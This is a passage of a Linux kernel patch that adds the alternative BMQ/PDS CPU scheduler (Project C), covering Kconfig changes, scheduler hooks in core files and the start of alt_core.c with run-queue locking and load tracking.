+@@ -1043,6 +1075,7 @@ config RT_GROUP_SCHED
+ 	  realtime bandwidth for them.
+ 	  See Documentation/scheduler/sched-rt-group.rst for more information.
+ 
++endif #!SCHED_ALT
+ endif #CGROUP_SCHED
+ 
+ config UCLAMP_TASK_GROUP
+@@ -1287,6 +1320,7 @@ config CHECKPOINT_RESTORE
+ 
+ config SCHED_AUTOGROUP
+ 	bool "Automatic process group scheduling"
++	depends on !SCHED_ALT
+ 	select CGROUPS
+ 	select CGROUP_SCHED
+ 	select FAIR_GROUP_SCHED
+diff --git a/init/init_task.c b/init/init_task.c
+index ff6c4b9bfe6b..19e9c662d1a1 100644
+--- a/init/init_task.c
++++ b/init/init_task.c
+@@ -75,9 +75,15 @@ struct task_struct init_task
+ 	.stack		= init_stack,
+ 	.usage		= REFCOUNT_INIT(2),
+ 	.flags		= PF_KTHREAD,
++#ifdef CONFIG_SCHED_ALT
++	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++	.static_prio	= DEFAULT_PRIO,
++	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
++#else
+ 	.prio		= MAX_PRIO - 20,
+ 	.static_prio	= MAX_PRIO - 20,
+ 	.normal_prio	= MAX_PRIO - 20,
++#endif
+ 	.policy		= SCHED_NORMAL,
+ 	.cpus_ptr	= &init_task.cpus_mask,
+ 	.user_cpus_ptr	= NULL,
+@@ -88,6 +94,17 @@ struct task_struct init_task
+ 	.restart_block	= {
+ 		.fn = do_no_restart_syscall,
+ 	},
++#ifdef CONFIG_SCHED_ALT
++	.sq_node	= LIST_HEAD_INIT(init_task.sq_node),
++#ifdef CONFIG_SCHED_BMQ
++	.boost_prio	= 0,
++	.sq_idx		= 15,
++#endif
++#ifdef CONFIG_SCHED_PDS
++	.deadline	= 0,
++#endif
++	.time_slice	= HZ,
++#else
+ 	.se		= {
+ 		.group_node 	= LIST_HEAD_INIT(init_task.se.group_node),
+ 	},
+@@ -95,6 +112,7 @@ struct task_struct init_task
+ 		.run_list	= LIST_HEAD_INIT(init_task.rt.run_list),
+ 		.time_slice	= RR_TIMESLICE,
+ 	},
++#endif
+ 	.tasks		= LIST_HEAD_INIT(init_task.tasks),
+ #ifdef CONFIG_SMP
+ 	.pushable_tasks	= PLIST_NODE_INIT(init_task.pushable_tasks, MAX_PRIO),
+diff --git a/kernel/Kconfig.preempt b/kernel/Kconfig.preempt
+index c2f1fd95a821..41654679b1b2 100644
+--- a/kernel/Kconfig.preempt
++++ b/kernel/Kconfig.preempt
+@@ -117,7 +117,7 @@ config PREEMPT_DYNAMIC
+ 
+ config SCHED_CORE
+ 	bool "Core Scheduling for SMT"
+-	depends on SCHED_SMT
++	depends on SCHED_SMT && !SCHED_ALT
+ 	help
+ 	  This option permits Core Scheduling, a means of coordinated task
+ 	  selection across SMT siblings. When enabled -- see
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index ca826bd1eba3..60e194f1d6d8 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -791,7 +791,7 @@ static int validate_change(struct cpuset *cur, struct cpuset *trial)
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_SMP
++#if defined(CONFIG_SMP) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * Helper routine for generate_sched_domains().
+  * Do cpusets a, b have overlapping effective cpus_allowed masks?
+@@ -1187,7 +1187,7 @@ static void rebuild_sched_domains_locked(void)
+ 	/* Have scheduler rebuild the domains */
+ 	partition_and_rebuild_sched_domains(ndoms, doms, attr);
+ }
+-#else /* !CONFIG_SMP */
++#else /* !CONFIG_SMP || CONFIG_SCHED_ALT */
+ static void rebuild_sched_domains_locked(void)
+ {
+ }
+diff --git a/kernel/delayacct.c b/kernel/delayacct.c
+index e39cb696cfbd..463423572e09 100644
+--- a/kernel/delayacct.c
++++ b/kernel/delayacct.c
+@@ -150,7 +150,7 @@ int delayacct_add_tsk(struct taskstats *d, struct task_struct *tsk)
+ 	 */
+ 	t1 = tsk->sched_info.pcount;
+ 	t2 = tsk->sched_info.run_delay;
+-	t3 = tsk->se.sum_exec_runtime;
++	t3 = tsk_seruntime(tsk);
+ 
+ 	d->cpu_count += t1;
+ 
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 15dc2ec80c46..1e583e0f89a7 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -172,7 +172,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 			sig->curr_target = next_thread(tsk);
+ 	}
+ 
+-	add_device_randomness((const void*) &tsk->se.sum_exec_runtime,
++	add_device_randomness((const void*) &tsk_seruntime(tsk),
+ 			      sizeof(unsigned long long));
+ 
+ 	/*
+@@ -193,7 +193,7 @@ static void __exit_signal(struct task_struct *tsk)
+ 	sig->inblock += task_io_get_inblock(tsk);
+ 	sig->oublock += task_io_get_oublock(tsk);
+ 	task_io_accounting_add(&sig->ioac, &tsk->ioac);
+-	sig->sum_sched_runtime += tsk->se.sum_exec_runtime;
++	sig->sum_sched_runtime += tsk_seruntime(tsk);
+ 	sig->nr_threads--;
+ 	__unhash_process(tsk, group_dead);
+ 	write_sequnlock(&sig->stats_lock);
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 728f434de2bb..0e1082a4e878 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -337,21 +337,25 @@ static __always_inline void
+ waiter_update_prio(struct rt_mutex_waiter *waiter, struct task_struct *task)
+ {
+ 	waiter->prio = __waiter_prio(task);
+-	waiter->deadline = task->dl.deadline;
++	waiter->deadline = __tsk_deadline(task);
+ }
+ 
+ /*
+  * Only use with rt_mutex_waiter_{less,equal}()
+  */
+ #define task_to_waiter(p)	\
+-	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = (p)->dl.deadline }
++	&(struct rt_mutex_waiter){ .prio = __waiter_prio(p), .deadline = __tsk_deadline(p) }
+ 
+ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 						struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline < right->deadline);
++#else
+ 	if (left->prio < right->prio)
+ 		return 1;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -360,16 +364,22 @@ static __always_inline int rt_mutex_waiter_less(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return dl_time_before(left->deadline, right->deadline);
++#endif
+ 
+ 	return 0;
++#endif
+ }
+ 
+ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 						 struct rt_mutex_waiter *right)
+ {
++#ifdef CONFIG_SCHED_PDS
++	return (left->deadline == right->deadline);
++#else
+ 	if (left->prio != right->prio)
+ 		return 0;
+ 
++#ifndef CONFIG_SCHED_BMQ
+ 	/*
+ 	 * If both waiters have dl_prio(), we check the deadlines of the
+ 	 * associated tasks.
+@@ -378,8 +388,10 @@ static __always_inline int rt_mutex_waiter_equal(struct rt_mutex_waiter *left,
+ 	 */
+ 	if (dl_prio(left->prio))
+ 		return left->deadline == right->deadline;
++#endif
+ 
+ 	return 1;
++#endif
+ }
+ 
+ static inline bool rt_mutex_steal(struct rt_mutex_waiter *waiter,
+diff --git a/kernel/sched/Makefile b/kernel/sched/Makefile
+index 976092b7bd45..31d587c16ec1 100644
+--- a/kernel/sched/Makefile
++++ b/kernel/sched/Makefile
+@@ -28,7 +28,12 @@ endif
+ # These compilation units have roughly the same size and complexity - so their
+ # build parallelizes well and finishes roughly at once:
+ #
++ifdef CONFIG_SCHED_ALT
++obj-y += alt_core.o
++obj-$(CONFIG_SCHED_DEBUG) += alt_debug.o
++else
+ obj-y += core.o
+ obj-y += fair.o
++endif
+ obj-y += build_policy.o
+ obj-y += build_utility.o
+diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
+new file mode 100644
+index 000000000000..f5e9c01f9382
+--- /dev/null
++++ b/kernel/sched/alt_core.c
+@@ -0,0 +1,8111 @@
++/*
++ *  kernel/sched/alt_core.c
++ *
++ *  Core alternative kernel scheduler code and related syscalls
++ *
++ *  Copyright (C) 1991-2002  Linus Torvalds
++ *
++ *  2009-08-13	Brainfuck deadline scheduling policy by Con Kolivas deletes
++ *		a whole lot of those previous things.
++ *  2017-09-06	Priority and Deadline based Skip list multiple queue kernel
++ *		scheduler by Alfred Chen.
++ *  2019-02-20	BMQ(BitMap Queue) kernel scheduler by Alfred Chen.
++ */
++#include <linux/sched/cputime.h>
++#include <linux/sched/debug.h>
++#include <linux/sched/isolation.h>
++#include <linux/sched/loadavg.h>
++#include <linux/sched/mm.h>
++#include <linux/sched/nohz.h>
++#include <linux/sched/stat.h>
++#include <linux/sched/wake_q.h>
++
++#include <linux/blkdev.h>
++#include <linux/context_tracking.h>
++#include <linux/cpuset.h>
++#include <linux/delayacct.h>
++#include <linux/init_task.h>
++#include <linux/kcov.h>
++#include <linux/kprobes.h>
++#include <linux/nmi.h>
++#include <linux/scs.h>
++
++#include <uapi/linux/sched/types.h>
++
++#include <asm/irq_regs.h>
++#include <asm/switch_to.h>
++
++#define CREATE_TRACE_POINTS
++#include <trace/events/sched.h>
++#undef CREATE_TRACE_POINTS
++
++#include "sched.h"
++
++#include "pelt.h"
++
++#include "../../io_uring/io-wq.h"
++#include "../smpboot.h"
++
++/*
++ * Export tracepoints that act as a bare tracehook (ie: have no trace event
++ * associated with them) to allow external modules to probe them.
++ */
++EXPORT_TRACEPOINT_SYMBOL_GPL(pelt_irq_tp);
++
++#ifdef CONFIG_SCHED_DEBUG
++#define sched_feat(x)	(1)
++/*
++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.2-r0"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++struct affinity_context {
++	const struct cpumask *new_mask;
++	struct cpumask *user_mask;
++	unsigned int flags;
++};
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* task function */
++static inline const struct cpumask *task_user_cpus(struct task_struct *p)
++{
++	if (!p->user_cpus_ptr)
++		return cpu_possible_mask; /* &init_task.cpus_mask */
++	return p->user_cpus_ptr;
++}
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for(i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* water mark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
++
++/*
++ * This routine assume that the idle task always in queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compile should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight miss-attribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
